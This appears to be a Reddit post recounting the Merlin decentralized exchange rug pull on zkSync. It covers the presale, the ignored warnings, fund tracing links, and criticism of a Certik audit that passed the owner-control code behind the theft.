 | Let's start at the top. Merlin was a brand new decentralized exchange launching on zkSync. It was a fork of Camelot (arbitrum) with a fairly transparent, active team. Some of them were "doxxed". The quotes are because at this point, it's unknown if those are actually the identities of the devs, but we'll stick to the facts. April 25th: Presale goes live and genesis farms open. Early farming for the dex token of mage/stmage. StMage is just a locked version of the actual token that can be staked for dividends earned from the dex. Same old farm token shit, same as Camelot (grail/xgrail) nothing new. We have a three day LGE (liquidity generation event), not uncommon and they crossed $2m in less than 10 hours. People are excited to be on a new chain and it shows. Though a red flag here is that most LGEs of unknown devs launch on an already known site. Merlin used their own.But that's okay because Certik audited them and gave them a score of 90! Not a single critical issue mentioned. Great, right?.. right? April 26th: Discord starts getting sketchy as people start to report they can't unstake or remove their liquidity. It happens sometimes, these devs aren't perfect. The team keeps everyone calm and assures that it's just a UI error and you can still remove it through the contract. This isn't true but it calms everyone down a bit for a while. Then, a partner project (which had nothing to do with this, and lost ~10% of protocol owned liquidity) starts alerting the Merlin team that the LP they seeded is missing. He was ignored. Shortly after sending the alert to Prospero (the project lead, who is currently missing and I sure hope he's okay!), the analytics page suddenly goes down and Prospero disappears for several hours. That doesn't look good, especially since Etherscan is not available on zksync yet and we're using this janky explorer to try and see what is going on. Presale never skips a beat, people are still putting ETH into it along with LPs. Here we see he kept on trying to tell the Merlin devs something was wrong. The dev said he was "confused" and called him "incompetent". They said he was wrong, and doesn't understand how zk tech works. At this point it's becoming painfully obvious to everyone involved that the devs are in the process of rugging not only the presale, but also the Core LPs. There's a whole lot more drama here and back and forth of who is responsible and is it one dev or all devs, but this is getting long so I cut that out. I'll post the (I think) legit team member's response to all this at the end. From what I can tell, he was taken advantage of as well. So, fast forward a few hours and looks like only about $2 million missing, and nothing for a big baller like Certik, who immediately jump into action to let the community know they'll be exploring a $2 million compensation plan to cover Merlin victims. Saved, right? Well, maybe.. Next up is Certik, Not planning on doing anything, radio silence since. Okay! Lets jump back to the rug. How? How could devs rug liquidity pools and the presale after passing a Certik audit with a higher score than most legit projects get? It's simple. It's two small lines of code that anyone with basic knowledge of these contracts or Solidity. You don't need to be a dev to see this, but apparently Certik's $50k audit team, who does this for a living, missed it completely. BTW after the rug, they downgraded the score Merlin received to 38, then to "exit scam". Thanks for letting us know Certik, you're doing great! Now, these two lines of code essentially mean that the factory (here meaning the deployer, or rather exploiter address) has full control over any pair on the dex. Just like you would if it was a normal contract with your liquidity. Not necessarily 100% malicious but there's also not a single good reason to have this in the code. It's wholly unnecessary. That's it, that's all it takes to steal millions. Just have to hope no one notices. So while everyone is arguing about what is going on and who's involved the funds are just being ripped. Right in plain sight because the explorer sucks and is slow to load blocks as the finalize, but also because the devs have shut down the UI page so the majority of people can't investigate. Here's the contracts that were drained showing where some of the funds went if anyone is interested. From these contracts you can follow the money to a couple CEXs and various other wallets. ETH/USDC https://zksync2-mainnet.zkscan.io/address/0x82cf66e9a45Df1CD3837cF623F7E73C1Ae6DFf1e/token-transfers USDC/USD+ https://zksync2-mainnet.zkscan.io/address/0xA37125136121fB2beA2A68549AaF76fe6526758C/token-transfers Tarot https://zksync2-mainnet.zkscan.io/address/0x667A15E2A436aAacF6B51985185a26de569A9697/token-transfers MVX https://zksync2-mainnet.zkscan.io/address/0x5734Aa9d653990cad58d3039789aCa57FB804619/token-transfers GMD https://zksync2-mainnet.zkscan.io/address/0x41909ffb409Bf26b0042d7E0Dc8cB8Ac2Dc6002F/token-transfers Maybe we should ask around and see what others think? Here's another dev's response to the whole thing. Most of the funds were bridged back to eth mainnet and some ended up here https://debank.com/profile/0xa7d481944730a88b862eb57248cb1b2c8aa358ad where certik sent a message hoping they could reason with the scammers. It's important to note Certik said that they were aware of this issue, and it was included in the audit as non-critical. I struggle to see how that's non-critical but I don't get paid to audit contracts, so we'll leave it to the experts. https://etherscan.io/tx/0x3516a02013176e72d1963a5a62018a8014b0a284c3acf782cb4cac4d3d8e2de5
No response yet. After this, some of the funds were sent to binance and mexc, so there is some chance the exploiters are found at some point but the money is long gone. So there you go. You want to steal millions? Just half-ass fork someone else's code, hire a twitter influencer to push the launch, add these two lines, get Certik to sign off and bam you too can be an international outlaw! Bonus fact: ChatGPT caught these two lines that enabled the rug. https://nitter.net/AtlasIsMe/status/1651357976953749505 This is the full thread of the background drama from one of the team members. It looks like he really was screwed over and had nothing to do with this but that's not for me to decide. [link] [comments] |
You can get bonuses upto $100 FREE BONUS when you:
π° Install these recommended apps:
π² SocialGood - 100% Crypto Back on Everyday Shopping
π² xPortal - The DeFi For The Next Billion
π² CryptoTab Browser - Lightweight, fast, and ready to mine!
π° Register on these recommended exchanges:
π‘ Binanceπ‘ Bitfinexπ‘ Bitmartπ‘ Bittrexπ‘ Bitget
π‘ CoinExπ‘ Crypto.comπ‘ Gate.ioπ‘ Huobiπ‘ Kucoin.
Comments